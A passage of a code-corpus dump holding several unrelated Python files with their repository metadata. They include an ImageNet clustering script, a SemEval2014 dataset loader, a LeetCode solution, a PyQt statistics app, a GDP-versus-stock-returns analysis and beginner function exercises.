# Define transforms\n normalize = transforms.Normalize(\n mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]\n )\n imagenet_mean = [0.485, 0.456, 0.406]\n imagenet_std = [0.229, 0.224, 0.225]\n transform = transforms.Compose(\n [transforms.Resize(args.image_size), transforms.ToTensor(), normalize]\n )\n\n # Create datasets\n datasets = {\n split: RGBDataset(\n os.path.join(args.dataset_root, split),\n seed=123,\n transform=transform,\n image_size=args.image_size,\n truncate_count=args.truncate_count,\n )\n for split in [\"train\", \"val\", \"test\"]\n }\n\n # Create data loaders\n data_loaders = {\n split: DataLoader(\n dataset, batch_size=args.batch_size, shuffle=True, num_workers=16\n )\n for split, dataset in datasets.items()\n }\n\n device = torch.device(\"cuda:0\" if args.cuda else \"cpu\")\n\n # Create model\n net = FeatureNetwork()\n net.to(device)\n net.eval()\n\n # Generate image features for training images\n train_image_features = []\n train_image_paths = []\n\n for i, data in enumerate(data_loaders[\"train\"], 0):\n\n # sample data\n inputs, input_paths = data\n inputs = {key: val.to(device) for key, val in inputs.items()}\n\n # Extract features\n with torch.no_grad():\n feats = net(inputs[\"rgb\"]) # (bs, 512)\n feats = feats.detach().cpu().numpy()\n train_image_features.append(feats)\n train_image_paths += input_paths[\"rgb\"]\n\n train_image_features = np.concatenate(train_image_features, axis=0)\n\n # Generate image features for testing images\n test_image_features = []\n test_image_paths = []\n\n for i, data in enumerate(data_loaders[\"test\"], 0):\n\n # sample data\n inputs, input_paths = data\n inputs = {key: val.to(device) for key, val in inputs.items()}\n\n # Extract features\n with torch.no_grad():\n feats = net(inputs[\"rgb\"]) # (bs, 512)\n feats = feats.detach().cpu().numpy()\n test_image_features.append(feats)\n test_image_paths += input_paths[\"rgb\"]\n\n test_image_features = np.concatenate(test_image_features, axis=0) # (N, 512)\n\n # ================= Perform clustering ==================\n kmeans = MiniBatchKMeans(\n init=\"k-means++\",\n n_clusters=args.num_clusters,\n batch_size=args.batch_size,\n n_init=10,\n max_no_improvement=20,\n verbose=0,\n )\n save_h5_path = os.path.join(\n args.save_dir, f\"clusters_{args.num_clusters:05d}_data.h5\"\n )\n if os.path.isfile(save_h5_path):\n print(\"========> Loading existing clusters!\")\n h5file = h5py.File(os.path.join(save_h5_path), \"r\")\n train_cluster_centroids = np.array(h5file[\"cluster_centroids\"])\n kmeans.cluster_centers_ = train_cluster_centroids\n train_cluster_assignments = kmeans.predict(train_image_features) # (N, )\n h5file.close()\n else:\n kmeans.fit(train_image_features)\n train_cluster_assignments = kmeans.predict(train_image_features) # (N, )\n train_cluster_centroids = np.copy(\n kmeans.cluster_centers_\n ) # (num_clusters, 512)\n\n # Create a dictionary of cluster -> images for visualization\n cluster2image = {}\n if args.visualize_clusters:\n log_dir = os.path.join(\n args.save_dir, f\"train_clusters_#clusters{args.num_clusters:05d}\"\n )\n tbwriter = SummaryWriter(log_dir=log_dir)\n\n for i in range(args.num_clusters):\n valid_idxes = np.where(train_cluster_assignments == i)[0]\n valid_image_paths = [train_image_paths[j] for j in valid_idxes]\n # Shuffle and pick only upto 100 images per cluster\n random.shuffle(valid_image_paths)\n # Read the valid images\n valid_images = []\n for path in valid_image_paths[:100]:\n img = cv2.resize(\n np.flip(cv2.imread(path), axis=2), (args.image_size, args.image_size),\n )\n valid_images.append(img)\n valid_images = (\n np.stack(valid_images, axis=0).astype(np.float32) / 255.0\n ) # (K, H, W, C)\n valid_images = torch.Tensor(valid_images).permute(0, 3, 1, 2).contiguous()\n cluster2image[i] = valid_images\n if args.visualize_clusters:\n # Write the train image clusters to tensorboard\n tbwriter.add_images(f\"Cluster #{i:05d}\", valid_images, 0)\n\n h5file = h5py.File(\n os.path.join(args.save_dir, f\"clusters_{args.num_clusters:05d}_data.h5\"), \"a\"\n )\n\n if \"cluster_centroids\" not in h5file.keys():\n h5file.create_dataset(\"cluster_centroids\", data=train_cluster_centroids)\n for i in range(args.num_clusters):\n if f\"cluster_{i}/images\" not in h5file.keys():\n h5file.create_dataset(f\"cluster_{i}/images\", data=cluster2image[i])\n\n h5file.close()\n\n if args.visualize_clusters:\n # Dot product of test_image_features with train_cluster_centroids\n test_dot_centroids = np.matmul(\n test_image_features, train_cluster_centroids.T\n ) # (N, num_clusters)\n if args.normalize_embedding:\n test_dot_centroids = (test_dot_centroids + 1.0) / 2.0\n else:\n test_dot_centroids = F.softmax(\n torch.Tensor(test_dot_centroids), dim=1\n ).numpy()\n\n # Find the top-K matching centroids\n topk_matches = np.argpartition(test_dot_centroids, -5, axis=1)[:, -5:] # (N, 5)\n\n # Write the test nearest neighbors to tensorboard\n tbwriter = SummaryWriter(\n log_dir=os.path.join(\n args.save_dir, f\"test_neighbors_#clusters{args.num_clusters:05d}\"\n )\n )\n for i in range(100):\n test_image_path = test_image_paths[i]\n test_image = cv2.resize(\n cv2.imread(test_image_path), (args.image_size, args.image_size)\n )\n test_image = np.flip(test_image, axis=2).astype(np.float32) / 255.0\n test_image = torch.Tensor(test_image).permute(2, 0, 1).contiguous()\n topk_clusters = topk_matches[i]\n # Pick some 4 images representative of a cluster\n topk_cluster_images = []\n for k in topk_clusters:\n imgs = cluster2image[k][:4] # (4, C, H, W)\n if imgs.shape[0] == 0:\n continue\n elif imgs.shape[0] != 4:\n imgs_pad = torch.zeros(4 - imgs.shape[0], *imgs.shape[1:])\n imgs = torch.cat([imgs, imgs_pad], dim=0)\n # Downsample by a factor of 2\n imgs = F.interpolate(\n imgs, scale_factor=0.5, mode=\"bilinear\"\n ) # (4, C, H/2, W/2)\n # Reshape to form a grid\n imgs = imgs.permute(1, 0, 2, 3) # (C, 4, H/2, W/2)\n C, _, Hby2, Wby2 = imgs.shape\n imgs = (\n imgs.view(C, 2, 2, Hby2, Wby2)\n .permute(0, 1, 3, 2, 4)\n .contiguous()\n .view(C, Hby2 * 2, Wby2 * 2)\n )\n # Draw a red border\n imgs[0, :4, :] = 1.0\n imgs[1, :4, :] = 0.0\n imgs[2, :4, :] = 0.0\n imgs[0, -4:, :] = 1.0\n imgs[1, -4:, :] = 0.0\n imgs[2, -4:, :] = 0.0\n imgs[0, :, :4] = 1.0\n imgs[1, :, :4] = 0.0\n imgs[2, :, :4] = 0.0\n imgs[0, :, -4:] = 1.0\n imgs[1, :, -4:] = 0.0\n imgs[2, :, -4:] = 0.0\n topk_cluster_images.append(imgs)\n\n vis_img = torch.cat([test_image, *topk_cluster_images], dim=2)\n image_name = f\"Test image #{i:04d}\"\n for k in topk_clusters:\n score = test_dot_centroids[i, k].item()\n image_name += f\"_{score:.3f}\"\n tbwriter.add_image(image_name, vis_img, 0)\n\n\ndef str2bool(v):\n return True if v.lower() in [\"yes\", \"y\", \"true\", \"t\"] else False\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--image-size\", type=int, default=256)\n parser.add_argument(\"--dataset-root\", type=str, default=\"dataset\")\n parser.add_argument(\"--truncate-count\", type=int, default=-1)\n parser.add_argument(\"--batch-size\", type=int, default=128)\n parser.add_argument(\"--num-clusters\", type=int, default=100)\n parser.add_argument(\"--save-dir\", type=str, default=\"visualization_dir\")\n parser.add_argument(\"--visualize-clusters\", type=str2bool, default=True)\n parser.add_argument(\"--normalize-embedding\", type=str2bool, default=True)\n\n args = parser.parse_args()\n\n main(args)\n","repo_name":"facebookresearch/exploring_exploration","sub_path":"reconstruction_data_generation/generate_imagenet_clusters.py","file_name":"generate_imagenet_clusters.py","file_ext":"py","file_size_in_byte":10378,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"21"} +{"seq_id":"31908046116","text":"\nimport datasets\n\n_CITATION = \"\"\"\\\n@article{2014SemEval,\n title={SemEval-2014 Task 4: Aspect Based Sentiment Analysis},\n author={ Pontiki, M. and D Galanis and Pavlopoulos, J. and Papageorgiou, H. and Manandhar, S. },\n journal={Proceedings of International Workshop on Semantic Evaluation at},\n year={2014},\n}\n\"\"\"\n\n_LICENSE = \"\"\"\\\n Please click on the homepage URL for license details.\n\"\"\"\n\n_DESCRIPTION = \"\"\"\\\nA collection of SemEval2014 specifically designed to aid research in Aspect Based Sentiment Analysis.\n\"\"\"\n\n_CONFIG = [\n \n # restaurants domain\n \"restaurants\",\n # laptops domain\n \"laptops\",\n]\n\n_VERSION = \"0.0.1\"\n\n_HOMEPAGE_URL = \"https://alt.qcri.org/semeval2014/task4/index.php?id=data-and-tools\"\n_DOWNLOAD_URL = \"https://raw.githubusercontent.com/YaxinCui/ABSADataset/main/SemEval2014Task4/{split}/{domain}_{split}.xml\"\n\n\nclass SemEval2014Config(datasets.BuilderConfig):\n \"\"\"BuilderConfig for SemEval2014Config.\"\"\"\n\n def __init__(self, _CONFIG, **kwargs):\n super(SemEval2014Config, self).__init__(version=datasets.Version(_VERSION, \"\"), **kwargs),\n self.configs = _CONFIG\n\n\nclass SemEval2014(datasets.GeneratorBasedBuilder):\n \"\"\"The lingual Amazon Reviews Corpus\"\"\"\n\n BUILDER_CONFIGS = [\n SemEval2014Config(\n name=\"All\",\n _CONFIG=_CONFIG,\n description=\"A collection of SemEval2014 specifically designed to aid research in lingual Aspect Based Sentiment Analysis.\",\n )\n ] + [\n SemEval2014Config(\n name=config,\n _CONFIG=[config],\n description=f\"{config} of SemEval2014 specifically designed to aid research in Aspect Based Sentiment Analysis\",\n )\n for config in _CONFIG\n ]\n \n BUILDER_CONFIG_CLASS = SemEval2014Config\n DEFAULT_CONFIG_NAME = \"All\"\n\n def _info(self):\n return datasets.DatasetInfo(\n description=_DESCRIPTION,\n features=datasets.Features(\n {'text': datasets.Value(dtype='string'),\n 'aspectTerms': [\n {'from': datasets.Value(dtype='string'),\n 'polarity': datasets.Value(dtype='string'),\n 'term': datasets.Value(dtype='string'),\n 'to': datasets.Value(dtype='string')}\n ],\n 'aspectCategories': [\n {'category': datasets.Value(dtype='string'),\n 'polarity': datasets.Value(dtype='string')}\n ],\n 'domain': datasets.Value(dtype='string'),\n 'sentenceId': datasets.Value(dtype='string')\n }\n ),\n supervised_keys=None,\n license=_LICENSE,\n homepage=_HOMEPAGE_URL,\n citation=_CITATION,\n )\n\n def _split_generators(self, dl_manager): \n\n train_urls = [_DOWNLOAD_URL.format(split=\"train\", domain=config) for config in self.config.configs]\n dev_urls = [_DOWNLOAD_URL.format(split=\"trial\", domain=config) for config in self.config.configs]\n test_urls = [_DOWNLOAD_URL.format(split=\"test\", domain=config) for config in self.config.configs]\n\n train_paths = dl_manager.download_and_extract(train_urls)\n dev_paths = dl_manager.download_and_extract(dev_urls)\n test_paths = dl_manager.download_and_extract(test_urls)\n\n return [\n datasets.SplitGenerator(name=datasets.Split.TRAIN, gen_kwargs={\"file_paths\": train_paths, \"domain_list\": self.config.configs}),\n datasets.SplitGenerator(name=datasets.Split.VALIDATION, gen_kwargs={\"file_paths\": dev_paths, \"domain_list\": self.config.configs}),\n datasets.SplitGenerator(name=datasets.Split.TEST, gen_kwargs={\"file_paths\": test_paths, \"domain_list\": self.config.configs}),\n ]\n\n def _generate_examples(self, file_paths, domain_list):\n row_count = 0\n assert len(file_paths)==len(domain_list)\n\n for i in range(len(file_paths)):\n file_path, domain = file_paths[i], domain_list[i]\n semEvalDataset = SemEvalXMLDataset(file_path, domain)\n\n for example in semEvalDataset.SentenceWithOpinions:\n yield row_count, example\n row_count += 1\n\nfrom xml.dom.minidom import parse\n\nclass SemEvalXMLDataset():\n def __init__(self, file_name, domain):\n # 获得SentenceWithOpinions,一个List包含(reviewId, sentenceId, text, Opinions)\n\n self.SentenceWithOpinions = []\n self.xml_path = file_name\n\n self.sentenceXmlList = parse(self.xml_path).getElementsByTagName('sentence')\n\n for sentenceXml in self.sentenceXmlList:\n \n sentenceId = sentenceXml.getAttribute(\"id\")\n if len(sentenceXml.getElementsByTagName(\"text\")[0].childNodes) < 1:\n # skip no reviews part\n continue\n text = sentenceXml.getElementsByTagName(\"text\")[0].childNodes[0].nodeValue\n\n aspectTermsXLMList = sentenceXml.getElementsByTagName(\"aspectTerm\")\n aspectTerms = []\n for opinionXml in aspectTermsXLMList:\n # some text maybe have no opinion\n term = opinionXml.getAttribute(\"term\")\n polarity = opinionXml.getAttribute(\"polarity\")\n from_ = opinionXml.getAttribute(\"from\")\n to = opinionXml.getAttribute(\"to\")\n aspectTermDict = {\n \"term\": term,\n \"polarity\": polarity,\n \"from\": from_,\n \"to\": to\n }\n aspectTerms.append(aspectTermDict)\n\n # 从小到大排序\n aspectTerms.sort(key=lambda x: x[\"from\"])\n\n aspectCategoriesXmlList = sentenceXml.getElementsByTagName(\"aspectCategory\")\n aspectCategories = []\n for aspectCategoryXml in aspectCategoriesXmlList:\n category = aspectCategoryXml.getAttribute(\"category\")\n polarity = aspectCategoryXml.getAttribute(\"polarity\")\n aspectCategoryDict = {\n \"category\": category,\n \"polarity\": polarity\n }\n aspectCategories.append(aspectCategoryDict)\n\n self.SentenceWithOpinions.append({\n \"text\": text, \n \"aspectTerms\": aspectTerms,\n \"aspectCategories\": aspectCategories,\n \"domain\": domain, \n \"sentenceId\": sentenceId\n }\n )","repo_name":"YaxinCui/ABSADataset","sub_path":"cache/SemEval2014.py","file_name":"SemEval2014.py","file_ext":"py","file_size_in_byte":6561,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"22812900562","text":"global strArray\r\nstrArray = []\r\nglobal resultList\r\nresultList = []\r\nimport re\r\ndef main():\r\n str_slice()\r\n str_delete_duplicate()\r\n str_output()\r\n print(strArray)\r\n\r\ndef str_delete_duplicate():\r\n resultList.sort()\r\n [strArray.append(i) for i in resultList if not i in strArray]\r\n \r\n\r\ndef str_slice():\r\n with open(\"C:/Users/root/Desktop/ka.txt\",encoding = \"utf-8\")as f:\r\n for line in f:\r\n # print(line)\r\n result = re.findall(r'[\\s\\S]{1,}[\\d]{2}',line)\r\n for i in result:\r\n resultList.append(i)\r\n return\r\n\r\ndef str_output():\r\n with open(\"./output.txt\",\"w+\") as f:\r\n for each in strArray:\r\n f.write(str(each))\r\n f.write(\"\\n\")\r\n f.close()\r\n return\r\n\r\nmain()","repo_name":"CelestialCosmic/myTools","sub_path":"kairo.py","file_name":"kairo.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14735494824","text":"# enumerate() 函数 ,取出索引与元素本身\n\nL = ['Admin','Lisa','Bart','Paull']\na = tuple(enumerate(L))\n\nfor i in enumerate(L):\n index = i[0]\n name = i[1]\n print(index, name)\n\nL = (1, 'Lisa')\nfor index ,name in enumerate(L):\n print(index,name)\n\na = list(zip([10,20,30],['A','B','C']))\n\nprint(a)\n\n# map(function,iterable,....)\n#第一个参数function 以参数序列中的每一个元素调用function,返回包含每次function 函数返回值的新列表\n#利用map()函数,把一个list(包含若干不规范的英文名字)变成一个包含规范英文名字的list:\ndef format_name(s):\n s = s[0].upper() + s[1:].lower()\n return s\nprint(list(map(format_name, ['adam', 'LISA', 'barT'])))\n\n\n#reduce()对参数序列中元素进行累积\n#利用reduce()来求积:\nfrom functools import reduce\ndef prod(x,y):\n return x*y\n\nprint(reduce(prod,[2,4,5,7,12]))\n\n# 过滤掉不符合条件的元素,返回由符合条件元素组成的新迭代器对象\n#用filter()过滤出1~100中平方根是整数的数\ndef is_sqr(x):\n num = int(x**0.5)\n\n return x and num*num == x\n\nprint(list(filter(is_sqr,list(range(1,101)))))\n","repo_name":"xmc2016/python_study","sub_path":"Built_infunction/Functionl.py","file_name":"Functionl.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37227811633","text":"import sys\r\nimport statistics\r\nimport numpy as np\r\nfrom PyQt5 import uic, QtWidgets\r\n\r\nimport Outliers, Puntuacion_z\r\n\r\nqtCreatorFile = \"PROYECTO-Completo.ui\" # Nombre del archivo aquí.\r\nUi_MainWindow, QtBaseClass = uic.loadUiType(qtCreatorFile)\r\n\r\nclass MyApp(QtWidgets.QMainWindow, Ui_MainWindow):\r\n def __init__(self):\r\n QtWidgets.QMainWindow.__init__(self)\r\n Ui_MainWindow.__init__(self)\r\n self.setupUi(self)\r\n\r\n # Área de los Signals y Configuraciones Iniciales\r\n self.btnAceptar.clicked.connect(self.aceptar)\r\n\r\n # Área de los Slots\r\n def aceptar(self):\r\n datos = np.loadtxt('datos.txt', delimiter=',', skiprows=1, usecols=1)\r\n numeros = datos.tolist()\r\n\r\n if self.rB_media.isChecked():\r\n media = statistics.mean(numeros)\r\n print(\"Media: \" + str(media))\r\n elif self.rB_moda.isChecked():\r\n moda = statistics.mode(numeros)\r\n print(\"Moda: \" + str(moda))\r\n elif self.rB_mediana.isChecked():\r\n mediana = statistics.median(numeros)\r\n print(\"Mediana: \" + str(mediana))\r\n elif self.rB_vMayor.isChecked():\r\n mayor = max(numeros)\r\n print(\"Valor mayor: \" + str(mayor))\r\n elif self.rB_vMenor.isChecked():\r\n menor = min(numeros)\r\n print(\"Valor menor: \" + str(menor))\r\n\r\n\r\n if self.rB_normalizacion.isChecked():\r\n normalizacion = (np.array(numeros) - np.min(numeros)) / (np.max(numeros) - np.min(numeros))\r\n print(\"Normalización: \" + str(normalizacion))\r\n elif self.rB_estandarizacion.isChecked():\r\n estandarizacion = (np.array(numeros) - np.mean(numeros)) / np.std(numeros)\r\n print(\"Estandarización:\" + str(estandarizacion))\r\n elif self.rB_complemento.isChecked():\r\n complemento = []\r\n for numero in numeros:\r\n complemento.append(1 - numero)\r\n print(\"Complemento: \"+ str(complemento))\r\n\r\n if self.rB_IQR.isChecked():\r\n Q = Outliers.outliers(numeros)\r\n print(\"IQR: \"+str(Q))\r\n elif self.rB_PuntZ.isChecked():\r\n puntuacion_z = Puntuacion_z.calcular_puntuaciones_z(numeros)\r\n print(\"Puntuación Z: \"+str(puntuacion_z))\r\n else:\r\n self.mensaje(\"Falta por seleccionar alguna opción de alguna Tabla.\")\r\n\r\n def mensaje(self, texto):\r\n msj = QtWidgets.QMessageBox()\r\n msj.setText(texto)\r\n msj.exec_()\r\n\r\nif __name__ == \"__main__\":\r\n app = QtWidgets.QApplication(sys.argv)\r\n window = MyApp()\r\n window.show()\r\n sys.exit(app.exec_())\r\n\r\n","repo_name":"RocioRRdz/SE_I_U3_EQ_4","sub_path":"PROYECTO Unidad/Parte_2.py","file_name":"Parte_2.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18999150195","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom IPython.display import display\r\nimport seaborn\r\n\r\n#load US stocks and GDP datasets\r\nstocks = pd.read_csv('stocks.csv')\r\ngdp = pd.read_csv('gdp.csv')\r\n\r\n#set year as the index for stocks data frame\r\nstocks = stocks.set_index(['Year'])\r\n\r\n#rename the columns and set year as the index for gdp data frame\r\ngdp = gdp.rename(columns={'Unnamed: 0':'Year', 'GDP in billions of chained 2009 dollars':'Real GDP in billions'})\r\ngdp = gdp.set_index(['Year'])\r\ngdp.head()\r\n\r\n#drop the nomial gdp column\r\ngdp = gdp.drop('GDP in billions of current dollars', axis = 1)\r\ngdp.head()\r\n\r\n#merge gdp and stocks to one data frame and drop rows that contains Na\r\nnewData = pd.concat([gdp, stocks], axis = 1)\r\nnewData = newData.dropna()\r\n\r\n#create a new column called GDP growth rate\r\nnewData.loc[1929, 'Real GDP in billions']\r\nnewData['GDP copy'] = newData['Real GDP in billions']\r\n\r\n#create a function to calculate GDP growth rate\r\ndef growth ():\r\n n = 1930\r\n for n in range(1930, 2015):\r\n newData['GDP copy'].ix[n] = newData['Real GDP in billions'].ix[n-1]\r\n n += 1\r\n newData['GDP Growth Rate'] = (newData['Real GDP in billions']-newData['GDP copy'])/ newData['GDP copy']\r\n\r\n#call the function, perform the calculation\r\ngrowth()\r\n\r\n#drop all unneeded columns\r\nnewData = newData.drop(['Stocks','T.Bills','T.Bonds','GDP copy', 'Stocks - Bills', 'Stocks - Bonds'], axis=1)\r\nnewData.head()\r\n\r\n#format rate of returns and GDP growth rate to percent\r\nnewData['S&P 500'] = pd.Series(['{0:.2f}%'.format(val*100) for val in newData['S&P 500']],\r\n index = newData.index)\r\nnewData['3-month T.Bill'] = pd.Series(['{0:.2f}%'.format(val*100) for val in newData['3-month T.Bill']],\r\n index = newData.index)\r\nnewData['10-year T. Bond'] = pd.Series(['{0:.2f}%'.format(val*100) for val in newData['10-year T. Bond']],\r\n index = newData.index)\r\nnewData['GDP Growth Rate']= pd.Series(['{0:.2f}%'.format(val*100) for val in newData['GDP Growth Rate']],\r\n index = newData.index)\r\n\r\n#find the top5 years with highest GDP growth rate\r\nnewData['GDP Growth Rate'].sort_values(ascending = False).head()\r\n\r\n#find the top 5 years with highest rate of return for S&P 500 stocks\r\nnewData['S&P 500'].sort_values(ascending = False).head()\r\n\r\n#find the top 5 years with highest rate of return for T.Bill\r\nnewData['3-month T.Bill'].sort_values(ascending = False).head()\r\n\r\n#find the top 5 years with highest rate of return for T. bond\r\nnewData['10-year T. Bond'].sort_values(ascending = False).head()\r\n\r\n#create function to plot real GDP for selected year range\r\n\r\ndef gdp_range(y1, y2):\r\n data = newData.loc[y1:y2,'Real GDP in billions']\r\n plot = data.plot(kind = 'line', title =str(y1)+' - '+ str(y2)+ ' US GDP', figsize = (10, 5), fontsize=12)\r\n plt.xlabel('Year')\r\n plt.ylabel('$ in billions')\r\n \r\n #create function to format y label and make it display with commas\r\n def update_labels(ax):\r\n ylabels = [format(label, ',.0f') for label in ax.get_yticks()]\r\n ax.set_yticklabels(ylabels)\r\n update_labels(plot)\r\n \r\n plt.show()\r\n\r\n#plot real GDP from 2000 to 2015\r\ngdp_range(2000, 2015)\r\n\r\n#create function to plot all 3 types of stocks rate of return for selected year range \r\n\r\ndef plotRR(y1, y2):\r\n newData['S&P 500'] = newData['S&P 500'].replace('%', '', regex=True).astype('float')\r\n newData['3-month T.Bill'] = newData['3-month T.Bill'].replace('%', '', regex=True).astype('float')\r\n newData['10-year T. Bond'] = newData['10-year T. Bond'].replace('%', '', regex=True).astype('float')\r\n data = newData.loc[y1:y2, 'S&P 500':'10-year T. Bond']\r\n plot = data.plot(kind = 'line', title =str(y1)+' - '+ str(y2)+ ' US Stock Rate of Returns',figsize =(15, 6),fontsize=12)\r\n plt.xlabel('Year')\r\n plt.ylabel('Rate of Return %') \r\n plt.show()\r\n\r\nplotRR(2000,2015)\r\n\r\n#create function to plot GDP growth rate and rate of return of T.Bills in one plot\r\n\r\ndef gdp_Tbill(y1, y2):\r\n data = newData.loc[y1:y2]\r\n data1 = data.loc[:,'3-month T.Bill']\r\n plot = data1.plot(kind='line', label='T.Bill Rate of Return')\r\n data.loc[:,'GDP Growth Rate'].plot(kind = 'line' ,ax = plot, figsize=(10,5), fontsize=12)\r\n plt.legend(loc='best')\r\n plt.title(str(y1)+' - '+str(y1)+' US GDP Growth Rate vs. T.Bill Rate of Return')\r\n plt.xlabel('Year')\r\n plt.ylabel('%')\r\n plt.show()\r\n\r\ngdp_Tbill(2000,2015)\r\n\r\n#create function to plot GDP growth rate and stocks rate of return in one plot\r\n\r\ndef gdp_Tbond(y1, y2):\r\n data = newData.loc[y1:y2]\r\n data1 = data.loc[:,'10-year T. Bond']\r\n plot = data1.plot(kind='line', label='T. Bond Rate of Return')\r\n data.loc[:,'GDP Growth Rate'].plot(kind = 'line' ,ax = plot, figsize=(10,5), fontsize=12)\r\n plt.legend(loc='best')\r\n plt.title(str(y1)+' - '+str(y1)+' US GDP Growth Rate vs. T.Bond Rate of Return')\r\n plt.xlabel('Year')\r\n plt.ylabel('%')\r\n plt.show()\r\n\r\ngdp_Tbond(2000,2015)","repo_name":"violayang/datamining","sub_path":"gdp_analytics.py","file_name":"gdp_analytics.py","file_ext":"py","file_size_in_byte":5107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18406134409","text":"import itertools\nimport math\nimport operator\nimport random\nfrom bisect import *\nfrom collections import deque, defaultdict, Counter\nfrom heapq import *\nimport unittest\nfrom typing import List\ndef get_sol(): return Solution()\n\nclass Solution:\n # greedy\n # time O(nlogn) space O(1)\n def findLongestChain(self, pairs: List[List[int]]) -> int:\n pairs.sort(key=operator.itemgetter(1)) # sort based on 1 index\n b=float('-inf')\n cnt=0\n for pair in pairs:\n c = pair[0]\n if c>b:\n cnt+=1\n b=pair[1]\n return cnt\nclass Solution2:\n # greedy\n # time O(nlogn) space O(n)\n def findLongestChain(self, pairs: List[List[int]]) -> int:\n pairs.sort(key=operator.itemgetter(1)) # sort based on 1 index\n res=[[-2001,-2000]] # dummy\n for pair in pairs:\n b = res[-1][1]\n c = pair[0]\n if c>b: res.append(pair)\n return len(res)-1\nclass Solution3:\n # longest incresing subsequence\n # time O(n^2) space O(n^2)\n def findLongestChain(self, pairs: List[List[int]]) -> int:\n n=len(pairs)\n pairs.sort(key=operator.itemgetter(1))\n lis = [1]*n\n for i in range(n):\n for j in range(i):\n b=pairs[j][1]\n c=pairs[i][0]\n if c>b:\n lis[i]=max(lis[i],lis[j]+1)\n return max(lis)\n\nclass mytestcase(unittest.TestCase):\n def test1_1(self):\n pairs = [[1,2],[2,3],[3,4]]\n Output= 2\n self.assertEqual(Output,get_sol().findLongestChain(pairs))\n def test1_2(self):\n pairs = [[1,2],[7,8],[4,5]]\n Output= 3\n self.assertEqual(Output,get_sol().findLongestChain(pairs))\n","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/leetcode/lc646.py","file_name":"lc646.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"6662587016","text":"\r\n# Creating a siple class and onject function\r\nclass myFunction():\r\n\r\n def __init__(self, fname, lastname):\r\n self.fname = fname\r\n self.lastname = lastname\r\n\r\n def hello(self):\r\n print(\"Hi {} is this your last name {} ?\". format(self.fname, self.lastname))\r\n\r\n\r\ns1 = myFunction(\"neethu\", \"Vignesh\")\r\ns1.hello()\r\n\r\n#Unpack and perform highest value tuple from list of tuples \r\nmy_list = [(\"john\", 1000), (\"lisa\", 2300),(\"Ava\", 2400)]\r\n\r\ndef largerthan(my_list):\r\n\r\n max_time = 0\r\n best_name = ''\r\n\r\n for name, time in my_list:\r\n if time > max_time:\r\n max_time = time\r\n best_name = name\r\n else :\r\n best_name = \"Phoneix\"\r\n max_time = 1200\r\n return best_name, max_time\r\n\r\nname, time = largerthan(my_list)\r\nprint(name, time)\r\n\r\n#Dynamically Checking the arugments before passing into the function\r\ndef add_numbers(a,b):\r\n a = int(a)\r\n b =int(b)\r\n return str(a + b)\r\n\r\nres = add_numbers('66',4.7)\r\nprint(res)\r\n\r\n#Return True if any number is even inside a list\r\n\r\nmy_lst =[1,2,4,8,9,12]\r\n### List Comprehension\r\nempty_lst = [j for j in my_lst if j % 2 ==0 ]\r\nprint(empty_lst)\r\n\r\ndef checkeven_number(my_lst):\r\n empty_lst = []\r\n for i in my_lst:\r\n print(i)\r\n if i % 2 == 0 :\r\n empty_lst.append(i)\r\n else :\r\n pass #return \"No Even Number\"\r\n return empty_lst\r\n\r\nresult = checkeven_number(my_lst)\r\nprint(result)\r\n\r\n#parameter and Arguments\r\n\r\n#parameters while defining the function\r\ndef hello_name(name, age):\r\n return 'Welcome ' +name+ ' your age is ' +str(age)+ '. Have a nice time.' #here name and age is variable\r\n\r\n#here it is arguments or invoking or calling the function\r\nprint(hello_name(\"neethu\", 27))\r\n\r\n\r\n#Default parameter and keyword arguments\r\ndef hello_name(name=\"joey\", age=78):\r\n return 'Welcome ' +name+ ' your age is ' +str(age)+ '. Have a nice time.' \r\n\r\n\r\nprint(hello_name(\"chandler\", 77))\r\nprint(hello_name(\"monica\", 79))\r\nprint(hello_name(\"phoebe\")) #default parameter\r\nprint(hello_name(age= 27, name=\"rachel\")) #keyword arguments\r\nprint(hello_name())\r\n\r\n\r\n#Problem Practice:\r\n#age = input(\"What is your age?: \")\r\n\r\n#1. Wrap the above code in a function called checkDriverAge(). Whenever you call this function, you will get prompted for age. \r\n# Notice the benefit in having checkDriverAge() instead of copying and pasting the function everytime?\r\n\r\n#2 Instead of using the input(). Now, make the checkDriverAge() function accept an argument of age, so that if you enter:\r\n#checkDriverAge(92);\r\n#it returns \"Powering On. Enjoy the ride!\"\r\n#also make it so that the default age is set to 0 if no argument is given.\r\n\r\n\r\ndef checkDriverAge(age =0):\r\n if int(age) < 18:\r\n print(\"Sorry, you are too young to drive this car. Powering off\")\r\n elif int(age) > 18:\r\n print(\"Powering On. Enjoy the ride!\")\r\n elif int(age) == 18:\r\n print(\"Congratulations on your first year of driving. Enjoy the ride!\")\r\n\r\nprint(checkDriverAge(92))\r\n\r\n\r\n#Methods Vs Functions\r\n\r\n#docstrings\r\n\r\ndef test_a(a):\r\n '''\r\n This function describes about the parameter a\r\n\r\n '''\r\n return a\r\n\r\nprint(test_a('((((ppp)))'))\r\n\r\n#*args, **kwargs\r\n\r\ndef super_func(*args, **kwargs):\r\n print(args)\r\n total = 0\r\n for i in kwargs.values():\r\n total += i\r\n\r\n return sum(args) + total\r\n\r\nprint(super_func(1,2,3,45,55, num=11, num2 = 77))\r\n\r\n\r\n\r\ndef highest_even(li):\r\n li = sorted(li)\r\n lst = []\r\n for i in li:\r\n if i%2 == 0:\r\n lst.append(i)\r\n return (lst)[-1]\r\n\r\n\r\nprint(highest_even([10000,13,-19,30,100]))\r\n\r\n\r\n#Walrus Operator :=\r\n\r\n#Scope - What variables do I 